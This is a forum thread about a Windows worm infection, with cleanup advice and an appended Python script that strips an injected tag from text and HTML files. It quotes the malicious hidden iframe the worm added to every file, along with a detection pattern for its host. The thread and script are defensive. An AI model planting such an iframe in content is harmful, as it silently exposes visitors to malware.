
Windows And My Internet Acting Weird..


rainman


Something fishy seems to be going on with my computer since last night. When I browse the internet, I can load the first 1-2 pages, then all I get are blank pages, and instantly. It doesn't even try to resolve the domain. I thought at first that it may be my DSL, so I changed to dialup. Same thing. I even tried another Windows user account and had the same problem. Can't be my router either, my wife's computer on the same network (where I'm typing from now) is working fine.

Not even transfers between my computer and my wife's computer on the internal network are working.

And randomly, I'm getting strange Windows error messages that I've never seen before in my 10+ years on a computer every day. I'm starting to think there's a virus, so I turned off all connections and am backing up the data, going for a format.

Strange stuff indeed. :o

Link to comment

I believe your computer is infected!

If you are familiar with changing a hard disk etc., you could do this:

Take the hard disk out of your computer and connect it to your wife's computer. Supposing your wife's computer has antivirus running as a system service (meaning the protection starts at boot), do a deep scan for viruses, rootkits, spyware, trojans and all these "animals".

If I were you, I would save my data to a different HDD, then format and install a clean system!

Link to comment

I was able to back up all my data and re-install Windows. I then installed Firefox and Skype, and guess what... I got the same crap again! I'm thinking it's some kind of worm, but it is getting in even though Windows Firewall is turned on.

The file is running and it's called 'systs.exe' and apparently has also installed itself into the Windows Services as 'tjk8rla0zxexp' and runs systs.exe on start-up. And from there I believe it disables Windows Firewall. Now it's disabled again, on a brand new copy of Windows!

Link to comment

I would suggest getting some recent AV software to get rid of the virus/trojan/worm before doing another reinstall. Most of the time AV software can remove the offending programs without you having to reinstall things.

Also - did you insert any CDs or USB sticks that may have had copies of the virus? Definitely turn off auto-start, you can do that with Windows PowerToys, a free download from MS.

Maybe download a Linux boot CD with a virus scanner - that allows you to boot from CD into Linux meaning you can be sure that the trojan is not running. This could be a good time to install and try out Ubuntu on a second partition :o

Also make sure there are no other machines on your network, or if you are on some shared WiFi or something, don't use that. Install a recent AV program. If you really want to make your system secure, use Secure-IT (unfortunate name for Google searches) or something similar - it modifies your registry and allows you to shut down many services that you never use and most likely never knew Windows had.

Link to comment

I did a full format, didn't insert any USB things or even CDs. Just the drivers for my motherboard and graphic card. I did find out what the worm or virus was, though. It was 'AWC' or something, which then downloaded other programs to further wreck my computer, by itself. I finally, after almost 24 hours, managed to completely get rid of it. Cleaned the registry, startup programs, etc.

Link to comment

Will try that, thanks!

Just when I thought it's over, I noticed that the virus/worm has added a line of code into ALL my plain text files, including .TXT and .HTML, at the bottom, nearly the last line:

<iframe src="http://ntkrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"></iframe>

When I opened one of the HTML files, and obviously got redirected to that hidden frame through the browser, I got this Windows crash message. I never heard of that sysnnwk.exe file and a search on Google doesn't have any records of it either. I think that web page there is causing the worm to activate, if you're already infected.

Remember in my first post I said I was getting blank pages? I don't think they were blank, but probably that hidden iframe code...


Link to comment

The code is apparently based on an old Trojan, Agent Z. Most recent reports are in Chinese and a few in German. Try searching for ntkrnlpa.info/rc/. Google highlights the site as a threat as well.

Infection involves files:-

NtCreateFile
NtCreateProcess
NtCreateProcessEx
ZwCreateFile
ZwCreateProcess
ZwCreateProcessEx

One other option is to process the html and txt files with a program such as ReplaceEm which would erase the key line in these files.

Regards

Link to comment
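
An added example, not part of the original thread: a Python script that does what the last reply suggests, finding and removing the injected iframe from .txt/.html files. The function names, the `.infected.bak` backup suffix and the sample files are assumptions made for the illustration; the matched host is the one in the injected line quoted above.

```python
import re
import shutil
import tempfile
from pathlib import Path

INDICATOR_HOST = b"ntkrnlpa.info"   # host from the injected line quoted in the thread
TARGET_SUFFIXES = {".txt", ".html", ".htm"}
# Constructed sample: the injected line as quoted in the thread.
SAMPLE = (b'<iframe src="http://ntkrnlpa.info/rc/?i=1" width=1 height=1 '
          b'style="border:0"></iframe>')

# A whole <iframe>...</iframe> element whose src host is the indicator (or a
# subdomain of it). Bytes pattern, so legacy encodings pass through untouched.
INJECTED = re.compile(
    rb"<iframe\b[^>]*\bsrc\s*=\s*[\"']?https?://(?:[\w.-]*\.)?"
    + re.escape(INDICATOR_HOST) + rb"\b[^>]*>\s*</iframe\s*>",
    re.IGNORECASE)

def strip_injection(data):
    """Return (cleaned_bytes, tags_removed), preserving original line endings."""
    kept, removed = [], 0
    for line in data.splitlines(keepends=True):
        cleaned, n = INJECTED.subn(b"", line)
        removed += n
        if n and not cleaned.strip():
            continue                 # line held only the injected tag: drop it
        kept.append(cleaned)         # tag was appended to real content: keep rest
    return b"".join(kept), removed

def clean_tree(root, apply=False):
    """Report {relative_path: tags_found}; rewrite files only when apply=True."""
    root, report = Path(root), {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in TARGET_SUFFIXES:
            continue
        cleaned, removed = strip_injection(path.read_bytes())
        if removed:
            report[path.relative_to(root).as_posix()] = removed
            if apply:                # keep the infected copy for later analysis
                shutil.copy2(path, path.with_name(path.name + ".infected.bak"))
                path.write_bytes(cleaned)
    return report

def demo():
    """Build a small constructed tree, clean it, return (report, notes_bytes)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "notes.txt").write_bytes(b"list\r\n" + SAMPLE + b"\r\nend\r\n")
        (root / "page.html").write_bytes(b"<body>hi" + SAMPLE + b"</body>\n")
        (root / "ok.html").write_bytes(b'<iframe src="http://example.com/"></iframe>\n')
        return clean_tree(root, apply=True), (root / "notes.txt").read_bytes()

if __name__ == "__main__":
    print(demo())
```

Calling `clean_tree(root)` without `apply=True` only reports which files carry the tag. Rewriting is best done with the disk mounted from a clean system, such as the Linux boot CD mentioned earlier in the thread, so the infector is not running while files are cleaned.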
